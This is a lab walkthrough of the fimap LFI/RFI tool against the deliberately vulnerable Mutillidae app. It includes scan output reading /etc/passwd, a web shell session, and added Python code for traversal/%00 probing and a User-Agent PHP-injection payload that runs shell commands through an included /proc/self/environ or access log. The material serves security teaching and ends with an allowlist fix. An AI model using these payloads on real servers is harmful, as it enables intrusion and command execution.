
FIMAP – LFI/RFI Auditing Tool.

June 26, 2012

FIMAP:

Fimap is a local and remote file inclusion (LFI/RFI) auditing tool: a small Python program that can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in web applications. Think of it as sqlmap for LFI/RFI bugs instead of SQL injection. At the time of writing it was still under heavy development, but usable.

The goal of fimap is to improve the quality and security of your website.

Do not use this tool on servers where you don’t have permission to pentest!


How to use:

fimap.py [Options]

[Options]

  •  -h – Help
  •  -u [URL] – URL to scan
  •  -m – Mass scan
  •  -l [filename] – List of URLs for mass scan
  •  -g – Perform Google search to find URLs
  •  -q [query] – Google search query (used together with -g)
  •  -H – Harvests a URL recursively for additional URLs to scan
  •  -w [filename] – Write URL list for mass scan
  •  -b – Enables blind testing where errors are not reported by the web application
  •  -x – Exploit vulnerabilities

Output:
Scans target URL(s) for RFI/LFI bugs and, optionally, allows you to exploit any discovered vulnerabilities.

Mutillidae Web App (Metasploitable 2) LFI/RFI Auditing

Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP and Windows 7 using XAMPP, making it easy for users who do not want to administer a web server. It is already installed on Samurai WTF and Rapid7 Metasploitable 2, and the existing version can be updated on either. NOWASP (Mutillidae) contains dozens of vulnerabilities and hints to help the user, providing an easy-to-use web hacking environment deliberately designed to be used as a lab for security enthusiasts, classrooms and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web security training courses, and as an "assess the assessor" target for vulnerability assessment software.


c:\Python25\fimap_alpha_v09>python fimap.py -u "http://192.168.235.129/mutillidae/index.php?page=user-info.php"
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.235.129/mutillidae/index.php?page=user-info.php'
[16:05:56] [OUT] Inspecting URL 'http://192.168.235.129/mutillidae/index.php?page=user-info.php'...
[16:05:56] [INFO] Fiddling around with URL...
[16:05:56] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.235.129/mutillidae/index.php?page=FmQXBJP2' with Parameter 'page'.
[16:05:56] [OUT] [PHP] Identifying Vulnerability 'http://192.168.235.129/mutillidae/index.php?page=user-info.php' with Parameter 'page'...
[16:05:56] [INFO] Scriptpath received: '/var/www/mutillidae'
[16:05:56] [INFO] Operating System is 'Unix-Like'.
[16:05:56] [INFO] Testing file '/etc/passwd'...
[16:05:57] [INFO] Testing file '/proc/self/environ'...
[16:05:57] [INFO] Testing file 'php://input'...
[16:05:57] [INFO] Testing file '/var/log/apache2/access.log'...
[16:05:57] [INFO] Testing file '/var/log/apache/access.log'...
[16:05:57] [INFO] Testing file '/var/log/httpd/access.log'...
[16:05:58] [INFO] Testing file '/var/log/apache2/access_log'...
[16:05:58] [INFO] Testing file '/var/log/apache/access_log'...
[16:05:58] [INFO] Testing file '/var/log/httpd/access_log'...
[16:05:58] [INFO] Testing file 'http://www.phpbb.de/index.php'...
###########################################################
#[1] Possible PHP-File Inclusion
#
###########################################################
#::REQUEST
#  [URL]        http://192.168.235.129/mutillidae/index.php?page=user-info.php
#  [HEAD SENT]
#::VULN INFO
#  [GET PARAM]  page
#  [PATH]       /var/www/mutillidae
#  [OS]         Unix
#  [TYPE]       Absolute Clean
#  [TRUNCATION] No Need. It’s clean.
#  [READABLE FILES]
#                   [0] /etc/passwd
#                   [1] /proc/self/environ
########################################################################

This information can be used to exploit the vulnerable system further, either manually or with another tool. Alternatively, we can use fimap's own attack features by adding the "-x" parameter to the command line; fimap then works from the results it stored during the scan, so the URL does not have to be given again.
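An added example, in Python, of the detection logic behind the scan output above; it is not fimap's own code. The transcript shows two steps: a random value in the parameter (the 'FmQXBJP2' request) to see whether the application fails like an include() would, which also yields the script path, and then a list of well-known files tried one at a time until their content comes back. Assumptions in this example: the PHP warning format it parses, the injected `fetch` callable (so it runs offline), and the two constructed mock targets at the bottom, one that includes the parameter as-is (the "Absolute Clean" case reported above) and one that appends ".php", which needs "../" traversal plus a %00 terminator.

```python
"""Added example, not fimap's code: a fimap-style LFI probe that produces the
fields shown in the report above ([PATH], [TYPE], [TRUNCATION], [READABLE FILES]).
Hypothetical: the warning regex, the `fetch` callable and the mock targets."""
import posixpath
import re
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# PHP's warning for a failed include() leaks the including script's path.
INCLUDE_WARNING = re.compile(
    r"include\((?P<arg>[^)]*)\): failed to open stream.*? in (?P<script>\S+\.php) on line")
# Files the scan above tries, each with a marker that proves the read worked.
PROBES = [
    ("/etc/passwd", re.compile(r"root:[^:]*:0:0:")),
    ("/proc/self/environ", re.compile(r"(?:HTTP_USER_AGENT|SCRIPT_FILENAME)=")),
]
MAX_DEPTH = 6  # how many "../" to try when absolute paths do not work


def with_param(url, param, value):
    """Return `url` with GET parameter `param` set to `value` (a NUL becomes %00)."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = value
    return urlunsplit(parts._replace(query=urlencode(query)))


def detect_include(url, param, fetch):
    """Step 1 ("Fiddling around with URL"): send a random value and look for the
    include() warning. Returns the script's directory, or None if no warning."""
    junk = secrets.token_hex(4)
    m = INCLUDE_WARNING.search(fetch(with_param(url, param, junk)))
    return posixpath.dirname(m.group("script")) if m else None


def include_shape(url, param, path, marker, fetch):
    """Step 2: find how `path` must be written so that its content comes back.
    Tries an absolute path, then ../ traversal, each without and with a trailing
    NUL (the NUL cuts off a suffix such as ".php" that the script appends; only
    PHP before 5.3.4 honours it). Returns (depth, truncated) or None."""
    for depth in range(MAX_DEPTH + 1):
        candidate = path if depth == 0 else "../" * depth + path.lstrip("/")
        for truncated in (False, True):
            body = fetch(with_param(url, param, candidate + ("\x00" if truncated else "")))
            if marker.search(body):
                return depth, truncated
    return None


def audit(url, param, fetch):
    """Run both steps and build a report like the one fimap prints."""
    report = {"path": detect_include(url, param, fetch), "type": None,
              "truncation": None, "readable": []}
    for path, marker in PROBES:
        shape = include_shape(url, param, path, marker, fetch)
        if shape is None:
            continue
        depth, truncated = shape
        report["readable"].append(path)
        if report["type"] is None:  # the shape is a property of the parameter, record it once
            report["type"] = "Absolute" if depth == 0 else "Relative (%d levels)" % depth
            report["truncation"] = truncated
    return report


# ---- constructed mock targets standing in for the Mutillidae host above ----
WEBROOT = "/var/www/mutillidae"
MOCK_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/bin/sh\n",
    "/proc/self/environ": "SCRIPT_FILENAME=%s/index.php\x00HTTP_USER_AGENT=fimap\x00" % WEBROOT,
    WEBROOT + "/user-info.php": "<h1>User info</h1>",
}


def php_include(arg):
    """Rough stand-in for include(): NUL truncation, '..' resolution, PHP-style warning."""
    path = posixpath.normpath(posixpath.join(WEBROOT, arg.split("\x00", 1)[0]))
    if path in MOCK_FS:
        return MOCK_FS[path]
    return ("Warning: include(%s): failed to open stream: No such file or directory"
            " in %s/index.php on line 12" % (arg, WEBROOT))


def clean_app(url):
    """index.php?page=X -> include($page): "Absolute Clean" in fimap's terms."""
    return php_include(dict(parse_qsl(urlsplit(url).query)).get("page", ""))


def suffix_app(url):
    """index.php?page=X -> include('pages/' . $page . '.php'): needs ../ and %00."""
    return php_include("pages/" + dict(parse_qsl(urlsplit(url).query)).get("page", "") + ".php")


TARGET = "http://192.168.235.129/mutillidae/index.php?page=user-info.php"
if __name__ == "__main__":
    print(audit(TARGET, "page", clean_app))
    print(audit(TARGET, "page", suffix_app))
```

The first target yields an "Absolute" report with no truncation needed, as in the scan above; the second only gives up /etc/passwd after four "../" and a NUL terminator, which is what fimap's [TRUNCATION] field is about. The NUL trick stopped working in PHP 5.3.4, so on a current server the second shape would have to be reached some other way, and a report with truncation required is worth re-checking by hand.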

c:\Python25\fimap_alpha_v09>python fimap.py -x
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###################################################
#:: List of Domains ::                            #
###################################################
#[1] 192.168.235.129                              #
#[ ] And 0 hosts with no valid attack vectors.    #
#[q] Quit                                         #
#######################################################
Choose Domain: 1
#######################################################
#:: FI Bugs on '192.168.235.129' ::
#
######################################################
#[1] URL: '/mutillidae/index.php?page=user-info.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #
#[q] Quit

#####################################################
Choose vulnerable script: 1
[16:17:49] [INFO] Testing PHP-code injection thru User-Agent...
[16:17:49] [OUT] PHP Injection works! Testing if execution works...
[16:17:49] [INFO] Testing execution thru 'popen[b64]'...
[16:17:49] [OUT] Execution thru 'popen[b64]' works!
####################################################
#:: Available Attacks – PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey’s reverse shell           #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait – Setting up shell (one request)…
——————————————-
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
——————————————-
fishell@www-data:/var/www/mutillidae$> who

We can see the result in the screenshots:

[Screenshot: Fimap]

[Screenshot: Fimap at work]
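The exploitation step above ("PHP-code injection thru User-Agent" against /proc/self/environ, then execution via "popen[b64]") as an added example in Python; it is not fimap's code. The mechanism: /proc/self/environ exposes the Apache worker's environment, which contains the current request's HTTP_USER_AGENT, and PHP's include() executes any <?php ... ?> block in the text it pulls in, so PHP code sent in the User-Agent header runs on the server when that file is included. Assumptions: the payload uses shell_exec() plus base64 (fimap's label only says popen with base64, the exact payload is not on this page), the marker scheme is mine, and `mock_environ_include` is a constructed stand-in for the vulnerable host that only "executes" this one payload shape.

```python
"""Added example (not fimap's code): command execution through a file inclusion
of /proc/self/environ with PHP code carried in the User-Agent header.
Hypothetical: the payload shape, the marker scheme and the mock server."""
import base64
import re
import secrets


def environ_payload(command, marker):
    """PHP block to place in the User-Agent header.

    The command is base64-encoded so the header carries no quotes, pipes or
    spaces that a log writer or proxy might mangle, and the command output is
    wrapped in `marker` so it can be cut out of the surrounding environ/HTML.
    """
    encoded = base64.b64encode(command.encode()).decode()
    return ('<?php echo "%s"; echo shell_exec(base64_decode("%s")); echo "%s"; ?>'
            % (marker, encoded, marker))


def extract_output(body, marker):
    """Return the text between the two markers, or None if the payload did not run."""
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), body, re.S)
    return m.group(1) if m else None


def run_command(command, send):
    """One command = one request, which is why the fimap shell is not persistent.

    `send(headers)` performs the request to index.php?page=/proc/self/environ
    and returns the response body; a fresh marker per call keeps outputs apart.
    """
    marker = secrets.token_hex(8)
    body = send({"User-Agent": environ_payload(command, marker)})
    return extract_output(body, marker)


# ---- constructed stand-in for the vulnerable server (no real PHP here) ----
CANNED_OUTPUT = {
    "id": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
    "whoami": "www-data\n",
}
PAYLOAD_SHAPE = re.compile(
    r'<\?php echo "(\w+)"; echo shell_exec\(base64_decode\("([A-Za-z0-9+/=]+)"\)\); '
    r'echo "\1"; \?>')


def mock_environ_include(headers):
    """What index.php?page=/proc/self/environ returns on the vulnerable host.

    The kernel exposes the worker's environment, which includes the request's
    User-Agent; PHP then executes <?php ... ?> inside the included text. This
    mock only understands the payload shape environ_payload() produces.
    """
    environ = "\x00".join([
        "HTTP_HOST=192.168.235.129",
        "HTTP_USER_AGENT=" + headers.get("User-Agent", ""),
        "SCRIPT_FILENAME=/var/www/mutillidae/index.php",
    ]) + "\x00"

    def execute(match):
        marker, encoded = match.group(1), match.group(2)
        command = base64.b64decode(encoded).decode()
        return marker + CANNED_OUTPUT.get(command, "sh: %s: not found\n" % command) + marker

    return "<html>" + PAYLOAD_SHAPE.sub(execute, environ) + "</html>"


if __name__ == "__main__":
    for cmd in ("id", "whoami"):
        print(run_command(cmd, mock_environ_include), end="")
```

The same payload works through the Apache access log paths the scan tried, since the User-Agent is written to the log and the log is then included; the file just has to be readable by the web server and the include has to reach it. On the application side the fix is never to hand user input to include(): map the page parameter to an allowlist of known files and reject anything else.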